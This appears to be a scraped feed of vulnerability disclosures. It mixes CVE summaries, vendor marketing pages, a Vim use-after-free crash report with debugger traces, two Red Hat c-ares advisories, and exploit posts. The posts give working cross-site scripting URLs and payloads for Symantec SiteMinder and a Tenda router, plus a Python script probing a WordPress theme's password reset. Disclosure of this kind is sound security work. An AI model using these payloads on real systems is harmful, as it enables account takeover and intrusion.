An issue was discovered in the Linux kernel through 6.1-rc8. dpu_crtc_atomic_check in drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c lacks check of the return value of kzalloc() and will cause the NULL Pointer Dereference.

CVE-2023-3220

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in
PaperCut NG/MF, which, under specific conditions, could potentially enable
an attacker to alter security settings or execute arbitrary code. This could
be exploited if the target is an admin with a current login session. Exploiting
this would typically involve the possibility of deceiving an admin into clicking
a specially crafted malicious link, potentially leading to unauthorized changes.


**Printing should be waste-free, easy, and secure...**

**DO YOU FIND PRINTING HARD?****Easily print from any device, anytime**

Printing is a boring part of IT because it should be, because it should “just work”. PaperCut empowers you to make printing easy again for your end users, whether they're printing from a BYOD or mobile device, and makes your life easy by auto-deploying print drivers. We’ve got truckloads more on offer, from industry-leading third-party integrations to easy tap-and-release Find-Me printing.

**WHAT WAS ON YOUR LAST UNCOLLECTED PRINTOUT?****Secure all documents before, during, and after printing**

Organizations spend a fortune protecting their digital data but a leak could be as simple as leaving a document on the printer. Control device access, implement secure print release or even digitally sign and watermark your print jobs to take security to a new level.

**WAS YOUR LAST JOB DOUBLE-SIDED?****Shrink your footprint and your bills**

Waste reduction and cost control is not about using a stick, it’s about subtly changing user behavior (a stick may help!). PaperCut is packed full of features such as encouraging duplex printing, implementing reasonable usage quotas, and full pay-for-print and print chargeback policies.

Did you know that when we surveyed our customers, we found that implementing just one feature, like secure print release, helped them save as much as 15%.

**SPRING UPDATE****PaperCut ranked #1 in Print Management**

Compare ratings for each primary feature and learn how PaperCut can help you save.

GET REPORT

**OUR PURPOSE****Crafting better environments**

At PaperCut we don't measure our success by profits and business metrics. Our success is the Forest Positive impact we've made on the planet, thanks to over 100 million users at over 70,000 organizations around the world who have saved billions of pages.

It's about the environments we create, the long-lasting relationships with our customers, the team that builds the tech, and how we make the world a better place.

Learn about us

**139M**

Smiling users

**89K**

Happy organizations

**30**

Languages

**195+**

Countries

**OUR PRODUCTS****Any brand, any platform, all environments**

It doesn't matter what size your organization is, what printers you use, or what operating system your users prefer – PaperCut is for you. We take a cross-platform, vendor-neutral approach to technology to deliver a print management solution that just works.

As techies, we love Windows, Linux, Mac, Chromebook, Android, iOS and yes... even Novell ;-)

   

EXPLORE PRODUCTS

CVE-2023-2533: PaperCut: Print management software

Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.

**VIM Version:**

    $ ./vim --version
    VIM - Vi IMproved 8.1 (2018 May 18, compiled Oct 10 2019 22:18:57)
    Included patches: 1-2133
    Compiled by input0@zero
    Huge version without GUI.  Features included (+) or not (-):
    +acl               -farsi             -mouse_sysmouse    -tag_any_white
    +arabic            +file_in_path      +mouse_urxvt       -tcl
    +autocmd           +find_in_path      +mouse_xterm       +termguicolors
    +autochdir         +float             +multi_byte        +terminal
    -autoservername    +folding           +multi_lang        +terminfo
    -balloon_eval      -footer            -mzscheme          +termresponse
    +balloon_eval_term +fork()            +netbeans_intg     +textobjects
    -browse            +gettext           +num64             +textprop
    ++builtin_terms    -hangul_input      +packages          +timers
    +byte_offset       +iconv             +path_extra        +title
    +channel           +insert_expand     -perl              -toolbar
    +cindent           +job               +persistent_undo   +user_commands
    +clientserver      +jumplist          +postscript        +vartabs
    +clipboard         +keymap            +printer           +vertsplit
    +cmdline_compl     +lambda            +profile           +virtualedit
    +cmdline_hist      +langmap           -python            +visual
    +cmdline_info      +libcall           -python3           +visualextra
    +comments          +linebreak         +quickfix          +viminfo
    +conceal           +lispindent        +reltime           +vreplace
    +cryptv            +listcmds          +rightleft         +wildignore
    +cscope            +localmap          -ruby              +wildmenu
    +cursorbind        -lua               +scrollbind        +windows
    +cursorshape       +menu              +signs             +writebackup
    +dialog_con        +mksession         +smartindent       +X11
    +diff              +modify_fname      -sound             +xfontset
    +digraphs          +mouse             +spell             -xim
    -dnd               -mouseshape        +startuptime       -xpm
    -ebcdic            +mouse_dec         +statusline        +xsmp_interact
    +emacs_tags        -mouse_gpm         -sun_workshop      +xterm_clipboard
    +eval              -mouse_jsbterm     +syntax            -xterm_save
    +ex_extra          +mouse_netterm     +tag_binary        
    +extra_search      +mouse_sgr         -tag_old_static    
       system vimrc file: "$VIM/vimrc"
         user vimrc file: "$HOME/.vimrc"
     2nd user vimrc file: "~/.vim/vimrc"
          user exrc file: "$HOME/.exrc"
           defaults file: "$VIMRUNTIME/defaults.vim"
      fall-back for $VIM: "/usr/local/share/vim"
    Compilation: afl-clang-fast -c -I. -Iproto -DHAVE_CONFIG_H     -g -O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1       
    Linking: afl-clang-fast   -L/usr/local/lib -Wl,--as-needed -o vim    -lSM -lICE -lXpm -lXt -lX11 -lXdmcp -lSM -lICE  -lm -ltinfo -lelf -lnsl  -ldl           
    

**MData:**

    While fuzzing VIM with enabling different mode an use-after-free was observed. This is 
    likely  a write access violation, which means the attacker may have control over the 
    write address and value.  
    

**GDB BT:**

    (gdb) run -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    Starting program: /home/input0/nvim/vim/src/vim -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    5307	    return buf != NULL && buf->b_p_bt[0] == 't';
    (gdb) bt 
    #0  0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    #1  0x00000000008ed15d in win_enter_ext (wp=<optimized out>, undo_sync=<optimized out>, curwin_invalid=0, 
        trigger_new_autocmds=<optimized out>, trigger_enter_autocmds=<optimized out>, trigger_leave_autocmds=<optimized out>) at window.c:4658
    #2  0x00000000008e8b02 in win_split_ins (size=<optimized out>, flags=<optimized out>, new_wp=<optimized out>, dir=<optimized out>)
        at window.c:1326
    #3  0x00000000008e0f1f in win_split (size=0, flags=0) at window.c:812
    #4  0x0000000000409e23 in do_argfile (eap=0x7fffffffa890, argn=0) at arglist.c:662
    #5  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #6  do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #7  0x00000000007a0b32 in do_source (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>) at scriptfile.c:1214
    #8  0x000000000079f5b9 in cmd_source (fname=0xc4f583 "out/id:000001,sig:11,src:018487,time:45124324+017124,op:splice,rep:8", 
        eap=<optimized out>) at scriptfile.c:805
    #9  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #10 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #11 0x000000000096e6c9 in exe_commands (parmp=<optimized out>) at main.c:3133
    #12 vim_main2 () at main.c:795
    #13 0x000000000096b597 in main (argc=<optimized out>, argv=<optimized out>) at main.c:444
    (gdb) i r
    rax            0xfffffffffffffffc	-4
    rbx            0xc6dae0	13032160
    rcx            0x0	0
    rdx            0xc27900	12744960
    rsi            0x0	0
    rdi            0x7ffff6c3fca0	140737333427360
    rbp            0xc6dae8	0xc6dae8
    rsp            0x7fffffff96c8	0x7fffffff96c8
    r8             0x5f	95
    r9             0x1	1
    r10            0x7fffffff8c60	140737488325728
    r11            0x0	0
    r12            0x1	1
    r13            0x0	0
    r14            0xfffffffffffffffc	-4
    r15            0x1	1
    rip            0x41adeb	0x41adeb <bt_terminal+75>
    eflags         0x10206	[ PF IF RF ]
    cs             0x33	51
    ss             0x2b	43
    ds             0x0	0
    es             0x0	0
    fs             0x0	0
    gs             0x0	0
    (gdb) 
    

**ASAN BT:**

    ==14666==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000f108 at pc 0x000000db2301 bp 0x7ffcbdb68e70 sp 0x7ffcbdb68e68
    READ of size 8 at 0x62500000f108 thread T0
        #0 0xdb2300 in win_enter_ext /home/input0/vim/src/window.c:4658:25
        #1 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
        #3 0x516344 in do_argfile /home/input0/vim/src/arglist.c:662:10
        #4 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #5 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #6 0xb60432 in do_source /home/input0/vim/src/scriptfile.c:1214:5
        #7 0xb5e5bf in cmd_source /home/input0/vim/src/scriptfile.c:805:14
        #8 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #9 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #10 0xe9998f in exe_commands /home/input0/vim/src/main.c:3133:2
        #11 0xe9998f in vim_main2 /home/input0/vim/src/main.c:795
        #12 0xe94b2c in main /home/input0/vim/src/main.c:444:12
        #13 0x7f32b72bbb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #14 0x41ff49 in _start (/home/input0/vim/src/vim+0x41ff49)
    
    0x62500000f108 is located 8 bytes inside of 8664-byte region [0x62500000f100,0x6250000112d8)
    freed by thread T0 here:
        #0 0x4d53e8 in __interceptor_free.localalias.0 (/home/input0/vim/src/vim+0x4d53e8)
        #1 0x8f411e in vim_free /home/input0/vim/src/misc2.c:1802:2
        #2 0x5270ea in apply_autocmds /home/input0/vim/src/autocmd.c:1607:12
        #3 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #4 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    previously allocated by thread T0 here:
        #0 0x4d55a0 in malloc (/home/input0/vim/src/vim+0x4d55a0)
        #1 0x8ef102 in lalloc /home/input0/vim/src/misc2.c:924:11
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/input0/vim/src/window.c:4658:25 in win_enter_ext
    Shadow bytes around the buggy address:
      0x0c4a7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c4a7fff9e20: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14666==ABORTING
    

**To Reproduce:** vim -u NONE -X -Z -e -s -S $POC -c ':qa!'

CVE-2020-20703: UAF: Access violation near NULL on destination operand · Issue #5041 · vim/vim

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

**View system messages via web**

Syslog messages  
Windows Events  
Status Reports  
Statistics  
Web based

  

Adiscon LogAnalyzer

  
Adiscon LogAnalyzer is a web inter-  
face to syslog and other network event data. It provides easy brow-  
sing, analysis of realtime network events and reporting services.

Reports

  
Reports help to keep an eye on network activity. It consolidate syslog and other event data providing an easy to read sheet. Charts help to see important things at a glance.

LogAnalyzer is part of Adiscon’s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).

CVE-2023-34600: Home - Adiscon LogAnalyzer

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

Red Hat Security Advisory 2023-3677-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3677-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3677  
Issue date:        2023-06-20  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_4.2.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-devel-1.13.0-5.el8_4.2.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_4.2.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-devel-1.13.0-5.el8_4.2.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJGf/9zjgjWX9erEAQh3qhAAl74xXfT8cPd/mANEZYuASoaIelFbDyHT  
/U2b1y/JstPgQ1CbvVORE5hOkI7drwE3C2STG2WLNjXv1rqyP0BJmYW7Y2gPNML8  
GzX1SAv9pvwyogJx4BjPzsSPV5RhFXyrXB43RzT5topJwNAokYOGjxM6yrxObTZN  
KitSozcArD2DCXIugHkBsLkFTSYiSiMxD/ckQ71j+HQY6AsazEpg95nbI+039DOk  
JlWNnXkHU6Softb4Nj4VFKPPHG2zb2lA16ptDMEBdprBwOZ9IlV3+6F21Ml7yRoc  
BT4mMXBhQ8N2PyEeQYJQL32mYjCaLu7LttgWDupL1Zj/nsgagrfQnDez6tqwvQzF  
0A7auw2esxzUb99JTTKUOlquD4ezzXZee/jY2tvg0Wmnpa5zF6eAU+EvnjRybach  
YcJ+I34zXE3w2hqzJdRid1s5xIpygIj7ebqWO54GOJRdIZB1iYoLoyjVkjxAI26n  
Je/YhrBBeSX8Laz+AD3qp80WE1EPXn9DWcW/KlowZHN9VD5b/6BRqVls1cVQFfDB  
aBBlLRO85sHlIe13YIHoQwfw8sN7cfQF67AT7YeBfl5l0Y7DsHtYGAi8x2OM27Rs  
Znm96i+s2o5i2FAkjCo0+FjzYJ0lJ5aQ5SVFoluSabLsUNCKT31zaGVe+JOWVP5S  
XVnYxk23dRM=  
=i0cM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3677-01

Red Hat Security Advisory 2023-3665-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3665-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3665  
Issue date:        2023-06-19  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
c-ares-1.13.0-5.el8_1.1.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_1.1.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-devel-1.13.0-5.el8_1.1.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_1.1.i686.rpm  
c-ares-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.i686.rpm  
c-ares-devel-1.13.0-5.el8_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJCi3dzjgjWX9erEAQhekA/+Kf1uGXbkxvv+xsdJnq+l52nR502WaIkD  
eKnu3niqW/ZarvBJZRibDUTmM2NIX7D49SPO5WmR/KcPGnkqh4B+TC+TinMOiopi  
KnMnugqL/ABB0zEQekuwCFpBxOxn4pSNNADJeu1mTo8Zoun/6cMhXtBNF9Miesuv  
Ff9y1jNBwOyX5cMgQLuGEVcB0MOsZmWt/nA5kcL72rI0EUQme/+P194jh6RdmzbV  
bHE4IVCF71Xmz3tTItgcs9O0igzKLh3wdM3Kts89SX/WQRjBwS/pRV2d66Q59ySg  
qcsBZMR0Isn+8EyzWwlj4UjXrSCVayu9KoBAVX/Pq8cXJyBbIKoPh9YL4/AcegvX  
xZDkLMdQqxXTnj8uwY+TFTOtATrvMXpJp9WMS7HeGwvkdO4Enm1vyrPNinK8ERCH  
F6Mc0eLOFHn1p9rCPM6FhT27bOX0YZw59PIQxiszGihKojfLqxy6dv5cS8L7Yaiw  
kP0Eed2e9j3wDm7bvpy/u7hZ7det+/uUp5PAd3Bvk+VW8WMu4oU4iLkac9zFhyOI  
QG1q6YAvkEepzo/X2WzcA7NKBUHKMSXhk5K7hD3LBJEpXObLmksE34QCs20dKxsd  
Nm+DH4QtkXhAik1Irrnw5+pa0tdr9RDVfz1fp0wtFn7sDz7Rkn7dIBOtqhudxSOj  
P1vqcBWcX+I=  
=2MFa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3665-01

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

Tenda AC6 AC1200 version 15.03.06.50_multi suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site scripting in the Tenda router via the deviceId parameter in the Parental Control module# Google Dork: None.# Date: Aug-30-2022# Exploit Author: 0x783# Vendor Homepage: https://tendacn.com/default.html# Software Link: https://www.tendacn.com/product/download/AC6.html# Version: AC6 AC1200 Smart Dual-Band WiFi Router - V15.03.06.50_multi# Tested on: Linux 5.15.0-58-generic# CVE : CVE-2022-40010-------------------------------------------------------------------------# 1. Technical Description:Tenda AC6 AC1200 Smart Dual-Band WiFi Router V15.03.06.50 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the deviceId parameter in the parental control section.# Steps to reproduce:1- Navigate to the router webserver usually at "http://192.168.0.1", or whatever the address of the router is.2- Navigate to the parental control section from the side bar.3- Add a new device to the list with any fake MAC address, device name, URL.4- Intercept the request using burpsuite and change the "deviceId" parameter to any javascript code (EX: <script>alert(document.domain")</script>).5- A pop-up with the domain should appear.

